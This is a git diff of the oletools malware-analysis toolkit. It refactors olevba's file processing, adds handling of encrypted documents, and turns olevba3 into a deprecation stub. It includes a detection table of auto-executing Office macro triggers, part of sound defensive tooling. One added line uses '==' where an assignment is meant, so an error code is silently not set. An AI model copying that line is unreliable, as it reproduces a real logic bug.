+
+ # even if processing succeeds, file might still be encrypted
+ log.debug('Checking for encryption (normal)')
+ if not crypto.is_encrypted(filename):
+ log.debug('no encryption detected')
+ return RETURN_OK
+ except Exception as exc:
+ log.debug('Checking for encryption (after exception)')
+ if crypto.is_encrypted(filename):
+ pass # deal with this below
+ else:
+ if isinstance(exc, (SubstreamOpenError, UnexpectedDataError)):
+ if options.output_mode in ('triage', 'unspecified'):
+ print('%-12s %s - Error opening substream or uenxpected ' \
+ 'content' % ('?', filename))
+ elif options.output_mode == 'json':
+ print_json(file=filename, type='error',
+ error=type(exc).__name__, message=str(exc))
+ else:
+ log.exception('Error opening substream or unexpected '
+ 'content in %s' % filename)
+ return RETURN_OPEN_ERROR
+ elif isinstance(exc, FileOpenError):
+ if options.output_mode in ('triage', 'unspecified'):
+ print('%-12s %s - File format not supported' % ('?', filename))
+ elif options.output_mode == 'json':
+ print_json(file=filename, type='error',
+ error=type(exc).__name__, message=str(exc))
+ else:
+ log.exception('Failed to open %s -- probably not supported!' % filename)
+ return RETURN_OPEN_ERROR
+ elif isinstance(exc, ProcessingError):
+ if options.output_mode in ('triage', 'unspecified'):
+ print('%-12s %s - %s' % ('!ERROR', filename, exc.orig_exc))
+ elif options.output_mode == 'json':
+ print_json(file=filename, type='error',
+ error=type(exc).__name__,
+ message=str(exc.orig_exc))
+ else:
+ log.exception('Error processing file %s (%s)!'
+ % (filename, exc.orig_exc))
+ return RETURN_PARSE_ERROR
+ else:
+ raise # let caller deal with this
+
+ # we reach this point only if file is encrypted
+ # check if this is an encrypted file in an encrypted file in an ...
+ if crypto_nesting >= crypto.MAX_NESTING_DEPTH:
+ raise crypto.MaxCryptoNestingReached(crypto_nesting, filename)
+
+ decrypted_file = None
+ try:
+ log.debug('Checking encryption passwords {}'.format(options.password))
+ passwords = options.password + crypto.DEFAULT_PASSWORDS
+ decrypted_file = crypto.decrypt(filename, passwords)
+ if not decrypted_file:
+ log.error('Decrypt failed, run with debug output to get details')
+ raise crypto.WrongEncryptionPassword(filename)
+ log.info('Working on decrypted file')
+ return process_file(decrypted_file, data, container or filename,
+ options, crypto_nesting+1)
+ except Exception:
+ raise
+ finally: # clean up
+ try:
+ log.debug('Removing crypt temp file {}'.format(decrypted_file))
+ os.unlink(decrypted_file)
+ except Exception: # e.g. file does not exist or is None
+ pass
+ # no idea what to return now
+ raise Exception('Programming error -- should never have reached this!')
+
+
+def main(cmd_line_args=None):
+ """
+ Main function, called when olevba is run from the command line
+
+ Optional argument: command line arguments to be forwarded to ArgumentParser
+ in process_args. Per default (cmd_line_args=None), sys.argv is used. Option
+ mainly added for unit-testing
+ """
+ options, args = parse_args(cmd_line_args)
+
# provide info about tool and its version
if options.output_mode == 'json':
- # prints opening [
+ # print first json entry with meta info and opening '['
print_json(script_name='olevba', version=__version__,
url='http://decalage.info/python/oletools',
- type='MetaInformation')
+ type='MetaInformation', _json_is_first=True)
else:
- print('olevba %s - http://decalage.info/python/oletools' % __version__)
+ # print banner with version
+ python_version = '%d.%d.%d' % sys.version_info[0:3]
+ print('olevba %s on Python %s - http://decalage.info/python/oletools' %
+ (__version__, python_version))
- logging.basicConfig(level=LOG_LEVELS[options.loglevel], format='%(levelname)-8s %(message)s')
+ logging.basicConfig(level=options.loglevel, format='%(levelname)-8s %(message)s')
# enable logging in the modules:
enable_logging()
- # Old display with number of items detected:
- # print '%-8s %-7s %-7s %-7s %-7s %-7s' % ('Type', 'Macros', 'AutoEx', 'Susp.', 'IOCs', 'HexStr')
- # print '%-8s %-7s %-7s %-7s %-7s %-7s' % ('-'*8, '-'*7, '-'*7, '-'*7, '-'*7, '-'*7)
-
# with the option --reveal, make sure --deobf is also enabled:
if options.show_deobfuscated_code and not options.deobfuscate:
- log.info('set --deobf because --reveal was set')
+ log.debug('set --deobf because --reveal was set')
options.deobfuscate = True
if options.output_mode == 'triage' and options.show_deobfuscated_code:
- log.info('ignoring option --reveal in triage output mode')
+ log.debug('ignoring option --reveal in triage output mode')
+
+ # gather info on all files that must be processed
+ # ignore directory names stored in zip files:
+ all_input_info = tuple((container, filename, data) for
+ container, filename, data in xglob.iter_files(
+ args, recursive=options.recursive,
+ zip_password=options.zip_password,
+ zip_fname=options.zip_fname)
+ if not (container and filename.endswith('/')))
+
+ # specify output mode if options -t, -d and -j were not specified
+ if options.output_mode == 'unspecified':
+ if len(all_input_info) == 1:
+ options.output_mode = 'detailed'
+ else:
+ options.output_mode = 'triage'
- # Column headers (do not know how many files there will be yet, so if no output_mode
- # was specified, we will print triage for first file --> need these headers)
- if options.output_mode in ('triage', 'unspecified'):
+ # Column headers for triage mode
+ if options.output_mode == 'triage':
print('%-12s %-65s' % ('Flags', 'Filename'))
print('%-12s %-65s' % ('-' * 11, '-' * 65))
previous_container = None
count = 0
container = filename = data = None
- vba_parser = None
return_code = RETURN_OK
try:
- for container, filename, data in xglob.iter_files(args, recursive=options.recursive,
- zip_password=options.zip_password, zip_fname=options.zip_fname):
- # ignore directory names stored in zip files:
- if container and filename.endswith('/'):
- continue
-
+ for container, filename, data in all_input_info:
# handle errors from xglob
if isinstance(data, Exception):
if isinstance(data, PathNotFoundException):
- if options.output_mode in ('triage', 'unspecified'):
+ if options.output_mode == 'triage':
print('%-12s %s - File not found' % ('?', filename))
elif options.output_mode != 'json':
log.error('Given path %r does not exist!' % filename)
return_code = RETURN_FILE_NOT_FOUND if return_code == 0 \
else RETURN_SEVERAL_ERRS
else:
- if options.output_mode in ('triage', 'unspecified'):
+ if options.output_mode == 'triage':
print('%-12s %s - Failed to read from zip file %s' % ('?', filename, container))
elif options.output_mode != 'json':
log.error('Exception opening/reading %r from zip file %r: %s'
@@ -3397,94 +4360,42 @@ def main():
error=type(data).__name__, message=str(data))
continue
- try:
- # Open the file
- vba_parser = VBA_Parser_CLI(filename, data=data, container=container,
- relaxed=options.relaxed)
-
- if options.output_mode == 'detailed':
- # fully detailed output
- vba_parser.process_file(show_decoded_strings=options.show_decoded_strings,
- display_code=options.display_code,
- hide_attributes=options.hide_attributes, vba_code_only=options.vba_code_only,
- show_deobfuscated_code=options.show_deobfuscated_code,
- deobfuscate=options.deobfuscate)
- elif options.output_mode in ('triage', 'unspecified'):
- # print container name when it changes:
- if container != previous_container:
- if container is not None:
- print('\nFiles in %s:' % container)
- previous_container = container
- # summarized output for triage:
- vba_parser.process_file_triage(show_decoded_strings=options.show_decoded_strings,
- deobfuscate=options.deobfuscate)
- elif options.output_mode == 'json':
- print_json(
- vba_parser.process_file_json(show_decoded_strings=options.show_decoded_strings,
- display_code=options.display_code,
- hide_attributes=options.hide_attributes, vba_code_only=options.vba_code_only,
- show_deobfuscated_code=options.show_deobfuscated_code,
- deobfuscate=options.deobfuscate))
- else: # (should be impossible)
- raise ValueError('unexpected output mode: "{0}"!'.format(options.output_mode))
- count += 1
-
- except (SubstreamOpenError, UnexpectedDataError) as exc:
- if options.output_mode in ('triage', 'unspecified'):
- print('%-12s %s - Error opening substream or uenxpected ' \
- 'content' % ('?', filename))
- elif options.output_mode == 'json':
- print_json(file=filename, type='error',
- error=type(exc).__name__, message=str(exc))
- else:
- log.exception('Error opening substream or unexpected '
- 'content in %s' % filename)
- return_code = RETURN_OPEN_ERROR if return_code == 0 \
- else RETURN_SEVERAL_ERRS
- except FileOpenError as exc:
- if options.output_mode in ('triage', 'unspecified'):
- print('%-12s %s - File format not supported' % ('?', filename))
- elif options.output_mode == 'json':
- print_json(file=filename, type='error',
- error=type(exc).__name__, message=str(exc))
- else:
- log.exception('Failed to open %s -- probably not supported!' % filename)
- return_code = RETURN_OPEN_ERROR if return_code == 0 \
- else RETURN_SEVERAL_ERRS
- except ProcessingError as exc:
- if options.output_mode in ('triage', 'unspecified'):
- print('%-12s %s - %s' % ('!ERROR', filename, exc.orig_exc))
- elif options.output_mode == 'json':
- print_json(file=filename, type='error',
- error=type(exc).__name__,
- message=str(exc.orig_exc))
- else:
- log.exception('Error processing file %s (%s)!'
- % (filename, exc.orig_exc))
- return_code = RETURN_PARSE_ERROR if return_code == 0 \
- else RETURN_SEVERAL_ERRS
- finally:
- if vba_parser is not None:
- vba_parser.close()
+ if options.output_mode == 'triage':
+ # print container name when it changes:
+ if container != previous_container:
+ if container is not None:
+ print('\nFiles in %s:' % container)
+ previous_container = container
+
+ # process the file, handling errors and encryption
+ curr_return_code = process_file(filename, data, container, options)
+ count += 1
+
+ # adjust overall return code
+ if curr_return_code == RETURN_OK:
+ continue # do not modify overall return code
+ if return_code == RETURN_OK:
+ return_code = curr_return_code # first error return code
+ else:
+ return_code = RETURN_SEVERAL_ERRS # several errors
if options.output_mode == 'triage':
- print('\n(Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, TXT=Text, M=Macros, ' \
+ print('\n(Flags: OpX=OpenXML, XML=Word2003XML, FlX=FlatOPC XML, MHT=MHTML, TXT=Text, M=Macros, ' \
'A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, ' \
'B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)\n')
- if count == 1 and options.output_mode == 'unspecified':
- # if options -t, -d and -j were not specified and it's a single file, print details:
- vba_parser.process_file(show_decoded_strings=options.show_decoded_strings,
- display_code=options.display_code,
- hide_attributes=options.hide_attributes, vba_code_only=options.vba_code_only,
- show_deobfuscated_code=options.show_deobfuscated_code,
- deobfuscate=options.deobfuscate)
-
if options.output_mode == 'json':
# print last json entry (a last one without a comma) and closing ]
print_json(type='MetaInformation', return_code=return_code,
n_processed=count, _json_is_last=True)
+ except crypto.CryptoErrorBase as exc:
+ log.exception('Problems with encryption in main: {}'.format(exc),
+ exc_info=True)
+ if return_code == RETURN_OK:
+ return_code = RETURN_ENCRYPTED
+ else:
+ return_code == RETURN_SEVERAL_ERRS
except Exception as exc:
# some unexpected error, maybe some of the types caught in except clauses
# above were not sufficient. This is very bad, so log complete trace at exception level
diff --git a/oletools/olevba3.py b/oletools/olevba3.py
index 802b3c30..23d65ba8 100644
--- a/oletools/olevba3.py
+++ b/oletools/olevba3.py
@@ -1,260 +1,10 @@
#!/usr/bin/env python
-"""
-olevba.py
-olevba is a script to parse OLE and OpenXML files such as MS Office documents
-(e.g. Word, Excel), to extract VBA Macro code in clear text, deobfuscate
-and analyze malicious macros.
+# olevba3 is a stub that redirects to olevba.py, for backwards compatibility
-Supported formats:
-- Word 97-2003 (.doc, .dot), Word 2007+ (.docm, .dotm)
-- Excel 97-2003 (.xls), Excel 2007+ (.xlsm, .xlsb)
-- PowerPoint 97-2003 (.ppt), PowerPoint 2007+ (.pptm, .ppsm)
-- Word 2003 XML (.xml)
-- Word/Excel Single File Web Page / MHTML (.mht)
-- Publisher (.pub)
+import sys, os, warnings
-Author: Philippe Lagadec - http://www.decalage.info
-License: BSD, see source code or documentation
-
-olevba is part of the python-oletools package:
-http://www.decalage.info/python/oletools
-
-olevba is based on source code from officeparser by John William Davison
-https://github.com/unixfreak0037/officeparser
-"""
-
-# === LICENSE ==================================================================
-
-# olevba is copyright (c) 2014-2017 Philippe Lagadec (http://www.decalage.info)
-# All rights reserved.
-#
-# Redistribution and use in source and binary forms, with or without modification,
-# are permitted provided that the following conditions are met:
-#
-# * Redistributions of source code must retain the above copyright notice, this
-# list of conditions and the following disclaimer.
-# * Redistributions in binary form must reproduce the above copyright notice,
-# this list of conditions and the following disclaimer in the documentation
-# and/or other materials provided with the distribution.
-#
-# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
-# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
-# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
-# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
-# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
-# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
-# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
-# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-
-
-# olevba contains modified source code from the officeparser project, published
-# under the following MIT License (MIT):
-#
-# officeparser is copyright (c) 2014 John William Davison
-#
-# Permission is hereby granted, free of charge, to any person obtaining a copy
-# of this software and associated documentation files (the "Software"), to deal
-# in the Software without restriction, including without limitation the rights
-# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
-# copies of the Software, and to permit persons to whom the Software is
-# furnished to do so, subject to the following conditions:
-#
-# The above copyright notice and this permission notice shall be included in all
-# copies or substantial portions of the Software.
-#
-# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
-# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
-# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
-# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
-# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
-# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
-# SOFTWARE.
-
-from __future__ import print_function
-
-#------------------------------------------------------------------------------
-# CHANGELOG:
-# 2014-08-05 v0.01 PL: - first version based on officeparser code
-# 2014-08-14 v0.02 PL: - fixed bugs in code, added license from officeparser
-# 2014-08-15 PL: - fixed incorrect value check in projecthelpfilepath Record
-# 2014-08-15 v0.03 PL: - refactored extract_macros to support OpenXML formats
-# and to find the VBA project root anywhere in the file
-# 2014-11-29 v0.04 PL: - use olefile instead of OleFileIO_PL
-# 2014-12-05 v0.05 PL: - refactored most functions into a class, new API
-# - added detect_vba_macros
-# 2014-12-10 v0.06 PL: - hide first lines with VB attributes
-# - detect auto-executable macros
-# - ignore empty macros
-# 2014-12-14 v0.07 PL: - detect_autoexec() is now case-insensitive
-# 2014-12-15 v0.08 PL: - improved display for empty macros
-# - added pattern extraction
-# 2014-12-25 v0.09 PL: - added suspicious keywords detection
-# 2014-12-27 v0.10 PL: - added OptionParser, main and process_file
-# - uses xglob to scan several files with wildcards
-# - option -r to recurse subdirectories
-# - option -z to scan files in password-protected zips
-# 2015-01-02 v0.11 PL: - improved filter_vba to detect colons
-# 2015-01-03 v0.12 PL: - fixed detect_patterns to detect all patterns
-# - process_file: improved display, shows container file
-# - improved list of executable file extensions
-# 2015-01-04 v0.13 PL: - added several suspicious keywords, improved display
-# 2015-01-08 v0.14 PL: - added hex strings detection and decoding
-# - fixed issue #2, decoding VBA stream names using
-# specified codepage and unicode stream names
-# 2015-01-11 v0.15 PL: - added new triage mode, options -t and -d
-# 2015-01-16 v0.16 PL: - fix for issue #3 (exception when module name="text")
-# - added several suspicious keywords
-# - added option -i to analyze VBA source code directly
-# 2015-01-17 v0.17 PL: - removed .com from the list of executable extensions
-# - added scan_vba to run all detection algorithms
-# - decoded hex strings are now also scanned + reversed
-# 2015-01-23 v0.18 PL: - fixed issue #3, case-insensitive search in code_modules
-# 2015-01-24 v0.19 PL: - improved the detection of IOCs obfuscated with hex
-# strings and StrReverse
-# 2015-01-26 v0.20 PL: - added option --hex to show all hex strings decoded
-# 2015-01-29 v0.21 PL: - added Dridex obfuscation decoding
-# - improved display, shows obfuscation name
-# 2015-02-01 v0.22 PL: - fixed issue #4: regex for URL, e-mail and exe filename
-# - added Base64 obfuscation decoding (contribution from
-# @JamesHabben)
-# 2015-02-03 v0.23 PL: - triage now uses VBA_Scanner results, shows Base64 and
-# Dridex strings
-# - exception handling in detect_base64_strings
-# 2015-02-07 v0.24 PL: - renamed option --hex to --decode, fixed display
-# - display exceptions with stack trace
-# - added several suspicious keywords
-# - improved Base64 detection and decoding
-# - fixed triage mode not to scan attrib lines
-# 2015-03-04 v0.25 PL: - added support for Word 2003 XML
-# 2015-03-22 v0.26 PL: - added suspicious keywords for sandboxing and
-# virtualisation detection
-# 2015-05-06 v0.27 PL: - added support for MHTML files with VBA macros
-# (issue #10 reported by Greg from SpamStopsHere)
-# 2015-05-24 v0.28 PL: - improved support for MHTML files with modified header
-# (issue #11 reported by Thomas Chopitea)
-# 2015-05-26 v0.29 PL: - improved MSO files parsing, taking into account
-# various data offsets (issue #12)
-# - improved detection of MSO files, avoiding incorrect
-# parsing errors (issue #7)
-# 2015-05-29 v0.30 PL: - added suspicious keywords suggested by @ozhermit,
-# Davy Douhine (issue #9), issue #13
-# 2015-06-16 v0.31 PL: - added generic VBA expression deobfuscation (chr,asc,etc)
-# 2015-06-19 PL: - added options -a, -c, --each, --attr
-# 2015-06-21 v0.32 PL: - always display decoded strings which are printable
-# - fix VBA_Scanner.scan to return raw strings, not repr()
-# 2015-07-09 v0.40 PL: - removed usage of sys.stderr which causes issues
-# 2015-07-12 PL: - added Hex function decoding to VBA Parser
-# 2015-07-13 PL: - added Base64 function decoding to VBA Parser
-# 2015-09-06 PL: - improved VBA_Parser, refactored the main functions
-# 2015-09-13 PL: - moved main functions to a class VBA_Parser_CLI
-# - fixed issue when analysis was done twice
-# 2015-09-15 PL: - remove duplicate IOCs from results
-# 2015-09-16 PL: - join long VBA lines ending with underscore before scan
-# - disabled unused option --each
-# 2015-09-22 v0.41 PL: - added new option --reveal
-# - added suspicious strings for PowerShell.exe options
-# 2015-10-09 v0.42 PL: - VBA_Parser: split each format into a separate method
-# 2015-10-10 PL: - added support for text files with VBA source code
-# 2015-11-17 PL: - fixed bug with --decode option
-# 2015-12-16 PL: - fixed bug in main (no options input anymore)
-# - improved logging, added -l option
-# 2016-01-31 PL: - fixed issue #31 in VBA_Parser.open_mht
-# - fixed issue #32 by monkeypatching email.feedparser
-# 2016-02-07 PL: - KeyboardInterrupt is now raised properly
-# 2016-02-20 v0.43 PL: - fixed issue #34 in the VBA parser and vba_chr
-# 2016-02-29 PL: - added Workbook_Activate to suspicious keywords
-# 2016-03-08 v0.44 PL: - added VBA Form strings extraction and analysis
-# 2016-03-04 v0.45 CH: - added JSON output (by Christian Herdtweck)
-# 2016-03-16 CH: - added option --no-deobfuscate (temporary)
-# 2016-04-19 v0.46 PL: - new option --deobf instead of --no-deobfuscate
-# - updated suspicious keywords
-# 2016-05-04 v0.47 PL: - look for VBA code in any stream including orphans
-# 2016-04-28 CH: - return an exit code depending on the results
-# - improved error and exception handling
-# - improved JSON output
-# 2016-05-12 CH: - added support for PowerPoint 97-2003 files
-# 2016-06-06 CH: - improved handling of unicode VBA module names
-# 2016-06-07 CH: - added option --relaxed, stricter parsing by default
-# 2016-06-12 v0.50 PL: - fixed small bugs in VBA parsing code
-# 2016-07-01 PL: - fixed issue #58 with format() to support Python 2.6
-# 2016-07-29 CH: - fixed several bugs including #73 (Mac Roman encoding)
-# 2016-08-31 PL: - added autoexec keyword InkPicture_Painted
-# - detect_autoexec now returns the exact keyword found
-# 2016-09-05 PL: - added autoexec keywords for MS Publisher (.pub)
-# 2016-09-06 PL: - fixed issue #20, is_zipfile on Python 2.6
-# 2016-09-12 PL: - enabled packrat to improve pyparsing performance
-# 2016-10-25 PL: - fixed raise and print statements for Python 3
-# 2016-10-25 PL: - fixed regex bytes strings (PR/issue #100)
-# 2016-11-03 v0.51 PL: - added EnumDateFormats and EnumSystemLanguageGroupsW
-# 2017-04-26 PL: - fixed absolute imports
-
-__version__ = '0.51'
-
-#------------------------------------------------------------------------------
-# TODO:
-# + setup logging (common with other oletools)
-# + add xor bruteforcing like bbharvest
-# + options -a and -c should imply -d
-
-# TODO later:
-# + performance improvement: instead of searching each keyword separately,
-# first split vba code into a list of words (per line), then check each
-# word against a dict. (or put vba words into a set/dict?)
-# + for regex, maybe combine them into a single re with named groups?
-# + add Yara support, include sample rules? plugins like balbuzard?
-# + add balbuzard support
-# + output to file (replace print by file.write, sys.stdout by default)
-# + look for VBA in embedded documents (e.g. Excel in Word)
-# + support SRP streams (see Lenny's article + links and sample)
-# - python 3.x support
-# - check VBA macros in Visio, Access, Project, etc
-# - extract_macros: convert to a class, split long function into smaller methods
-# - extract_macros: read bytes from stream file objects instead of strings
-# - extract_macros: use combined struct.unpack instead of many calls
-# - all except clauses should target specific exceptions
-
-#------------------------------------------------------------------------------
-# REFERENCES:
-# - [MS-OVBA]: Microsoft Office VBA File Format Structure
-# http://msdn.microsoft.com/en-us/library/office/cc313094%28v=office.12%29.aspx
-# - officeparser: https://github.com/unixfreak0037/officeparser
-
-
-#--- IMPORTS ------------------------------------------------------------------
-
-import sys, logging, os
-import struct
-from _io import StringIO,BytesIO
-import math
-import zipfile
-import re
-import optparse
-import binascii
-import base64
-import zlib
-import email # for MHTML parsing
-import string # for printable
-import json # for json output mode (argument --json)
-
-# import lxml or ElementTree for XML parsing:
-try:
- # lxml: best performance for XML processing
- import lxml.etree as ET
-except ImportError:
- try:
- # Python 2.5+: batteries included
- import xml.etree.cElementTree as ET
- except ImportError:
- try:
- # Python <2.5: standalone ElementTree install
- import elementtree.cElementTree as ET
- except ImportError:
- raise(ImportError, "lxml or ElementTree are not installed, " \
- + "see http://codespeak.net/lxml " \
- + "or http://effbot.org/zone/element-index.htm")
+warnings.warn('olevba3 is deprecated, olevba should be used instead.', DeprecationWarning)
# IMPORTANT: it should be possible to run oletools directly as scripts
# in any directory without installing them with pip or setup.py.
@@ -262,3204 +12,13 @@
# And to enable Python 2+3 compatibility, we need to use absolute imports,
# so we add the oletools parent folder to sys.path (absolute+normalized path):
_thismodule_dir = os.path.normpath(os.path.abspath(os.path.dirname(__file__)))
-# print('_thismodule_dir = %r' % _thismodule_dir)
_parent_dir = os.path.normpath(os.path.join(_thismodule_dir, '..'))
-# print('_parent_dir = %r' % _thirdparty_dir)
-if not _parent_dir in sys.path:
+if _parent_dir not in sys.path:
sys.path.insert(0, _parent_dir)
-from oletools.thirdparty import olefile
-from oletools.thirdparty.prettytable import prettytable
-from oletools.thirdparty.xglob import xglob, PathNotFoundException
-from oletools.thirdparty.pyparsing.pyparsing import \
- CaselessKeyword, CaselessLiteral, Combine, Forward, Literal, \
- Optional, QuotedString,Regex, Suppress, Word, WordStart, \
- alphanums, alphas, hexnums,nums, opAssoc, srange, \
- infixNotation, ParserElement
-import oletools.ppt_parser as ppt_parser
-
-# monkeypatch email to fix issue #32:
-# allow header lines without ":"
-import email.feedparser
-email.feedparser.headerRE = re.compile(r'^(From |[\041-\071\073-\176]{1,}:?|[\t ])')
-
-# === PYTHON 2+3 SUPPORT ======================================================
-
-if sys.version_info[0] <= 2:
- # Python 2.x
- if sys.version_info[1] <= 6:
- # Python 2.6
- # use is_zipfile backported from Python 2.7:
- from thirdparty.zipfile27 import is_zipfile
- else:
- # Python 2.7
- from zipfile import is_zipfile
-else:
- # Python 3.x+
- from zipfile import is_zipfile
- # xrange is now called range:
- xrange = range
-
-
-# === PYTHON 3.0 - 3.4 SUPPORT ======================================================
-
-# From https://gist.github.com/ynkdir/867347/c5e188a4886bc2dd71876c7e069a7b00b6c16c61
-
-if sys.version_info >= (3, 0) and sys.version_info < (3, 5):
- import codecs
-
- _backslashreplace_errors = codecs.lookup_error("backslashreplace")
-
- def backslashreplace_errors(exc):
- if isinstance(exc, UnicodeDecodeError):
- u = "".join("\\x{0:02x}".format(c) for c in exc.object[exc.start:exc.end])
- return (u, exc.end)
- return _backslashreplace_errors(exc)
-
- codecs.register_error("backslashreplace", backslashreplace_errors)
-
-
-# === LOGGING =================================================================
-
-class NullHandler(logging.Handler):
- """
- Log Handler without output, to avoid printing messages if logging is not
- configured by the main application.
- Python 2.7 has logging.NullHandler, but this is necessary for 2.6:
- see https://docs.python.org/2.6/library/logging.html#configuring-logging-for-a-library
- """
- def emit(self, record):
- pass
-
-def get_logger(name, level=logging.CRITICAL+1):
- """
- Create a suitable logger object for this module.
- The goal is not to change settings of the root logger, to avoid getting
- other modules' logs on the screen.
- If a logger exists with same name, reuse it. (Else it would have duplicate
- handlers and messages would be doubled.)
- The level is set to CRITICAL+1 by default, to avoid any logging.
- """
- # First, test if there is already a logger with the same name, else it
- # will generate duplicate messages (due to duplicate handlers):
- if name in logging.Logger.manager.loggerDict:
- #NOTE: another less intrusive but more "hackish" solution would be to
- # use getLogger then test if its effective level is not default.
- logger = logging.getLogger(name)
- # make sure level is OK:
- logger.setLevel(level)
- return logger
- # get a new logger:
- logger = logging.getLogger(name)
- # only add a NullHandler for this logger, it is up to the application
- # to configure its own logging:
- logger.addHandler(NullHandler())
- logger.setLevel(level)
- return logger
-
-# a global logger object used for debugging:
-log = get_logger('olevba')
-
-
-#=== EXCEPTIONS ==============================================================
-
-class OlevbaBaseException(Exception):
- """ Base class for exceptions produced here for simpler except clauses """
- def __init__(self, msg, filename=None, orig_exc=None, **kwargs):
- if orig_exc:
- super(OlevbaBaseException, self).__init__(msg +
- ' ({0})'.format(orig_exc),
- **kwargs)
- else:
- super(OlevbaBaseException, self).__init__(msg, **kwargs)
- self.msg = msg
- self.filename = filename
- self.orig_exc = orig_exc
-
-
-class FileOpenError(OlevbaBaseException):
- """ raised by VBA_Parser constructor if all open_... attempts failed
-
- probably means the file type is not supported
- """
-
- def __init__(self, filename, orig_exc=None):
- super(FileOpenError, self).__init__(
- 'Failed to open file %s' % filename, filename, orig_exc)
-
-
-class ProcessingError(OlevbaBaseException):
- """ raised by VBA_Parser.process_file* functions """
-
- def __init__(self, filename, orig_exc):
- super(ProcessingError, self).__init__(
- 'Error processing file %s' % filename, filename, orig_exc)
-
-
-class MsoExtractionError(RuntimeError, OlevbaBaseException):
- """ raised by mso_file_extract if parsing MSO/ActiveMIME data failed """
-
- def __init__(self, msg):
- MsoExtractionError.__init__(self, msg)
- OlevbaBaseException.__init__(self, msg)
-
-
-class SubstreamOpenError(FileOpenError):
- """ special kind of FileOpenError: file is a substream of original file """
-
- def __init__(self, filename, subfilename, orig_exc=None):
- super(SubstreamOpenError, self).__init__(
- str(filename) + '/' + str(subfilename), orig_exc)
- self.filename = filename # overwrite setting in OlevbaBaseException
- self.subfilename = subfilename
-
-
-class UnexpectedDataError(OlevbaBaseException):
- """ raised when parsing is strict (=not relaxed) and data is unexpected """
-
- def __init__(self, stream_path, variable, expected, value):
- super(UnexpectedDataError, self).__init__(
- 'Unexpected value in {0} for variable {1}: '
- 'expected {2:04X} but found {3:04X}!'
- .format(stream_path, variable, expected, value))
- self.stream_path = stream_path
- self.variable = variable
- self.expected = expected
- self.value = value
-
-#--- CONSTANTS ----------------------------------------------------------------
-
-# return codes
-RETURN_OK = 0
-RETURN_WARNINGS = 1 # (reserved, not used yet)
-RETURN_WRONG_ARGS = 2 # (fixed, built into optparse)
-RETURN_FILE_NOT_FOUND = 3
-RETURN_XGLOB_ERR = 4
-RETURN_OPEN_ERROR = 5
-RETURN_PARSE_ERROR = 6
-RETURN_SEVERAL_ERRS = 7
-RETURN_UNEXPECTED = 8
-
-# MAC codepages (from http://stackoverflow.com/questions/1592925/decoding-mac-os-text-in-python)
-MAC_CODEPAGES = {
- 10000: 'mac-roman',
- 10001: 'shiftjis', # not found: 'mac-shift-jis',
- 10003: 'ascii', # nothing appropriate found: 'mac-hangul',
- 10008: 'gb2321', # not found: 'mac-gb2312',
- 10002: 'big5', # not found: 'mac-big5',
- 10005: 'hebrew', # not found: 'mac-hebrew',
- 10004: 'mac-arabic',
- 10006: 'mac-greek',
- 10081: 'mac-turkish',
- 10021: 'thai', # not found: mac-thai',
- 10029: 'maccentraleurope', # not found: 'mac-east europe',
- 10007: 'ascii', # nothing appropriate found: 'mac-russian',
-}
-
-# URL and message to report issues:
-URL_OLEVBA_ISSUES = 'https://github.com/decalage2/oletools/issues'
-MSG_OLEVBA_ISSUES = 'Please report this issue on %s' % URL_OLEVBA_ISSUES
-
-# Container types:
-TYPE_OLE = 'OLE'
-TYPE_OpenXML = 'OpenXML'
-TYPE_Word2003_XML = 'Word2003_XML'
-TYPE_MHTML = 'MHTML'
-TYPE_TEXT = 'Text'
-TYPE_PPT = 'PPT'
-
-# short tag to display file types in triage mode:
-TYPE2TAG = {
- TYPE_OLE: 'OLE:',
- TYPE_OpenXML: 'OpX:',
- TYPE_Word2003_XML: 'XML:',
- TYPE_MHTML: 'MHT:',
- TYPE_TEXT: 'TXT:',
- TYPE_PPT: 'PPT',
-}
-
-
-# MSO files ActiveMime header magic
-MSO_ACTIVEMIME_HEADER = b'ActiveMime'
-
-MODULE_EXTENSION = "bas"
-CLASS_EXTENSION = "cls"
-FORM_EXTENSION = "frm"
-
-# Namespaces and tags for Word2003 XML parsing:
-NS_W = '{http://schemas.microsoft.com/office/word/2003/wordml}'
-# the tag contains the VBA macro code:
-TAG_BINDATA = NS_W + 'binData'
-ATTR_NAME = NS_W + 'name'
-
-# Keywords to detect auto-executable macros
-AUTOEXEC_KEYWORDS = {
- # MS Word:
- 'Runs when the Word document is opened':
- ('AutoExec', 'AutoOpen', 'DocumentOpen'),
- 'Runs when the Word document is closed':
- ('AutoExit', 'AutoClose', 'Document_Close', 'DocumentBeforeClose'),
- 'Runs when the Word document is modified':
- ('DocumentChange',),
- 'Runs when a new Word document is created':
- ('AutoNew', 'Document_New', 'NewDocument'),
-
- # MS Word and Publisher:
- 'Runs when the Word or Publisher document is opened':
- ('Document_Open',),
- 'Runs when the Publisher document is closed':
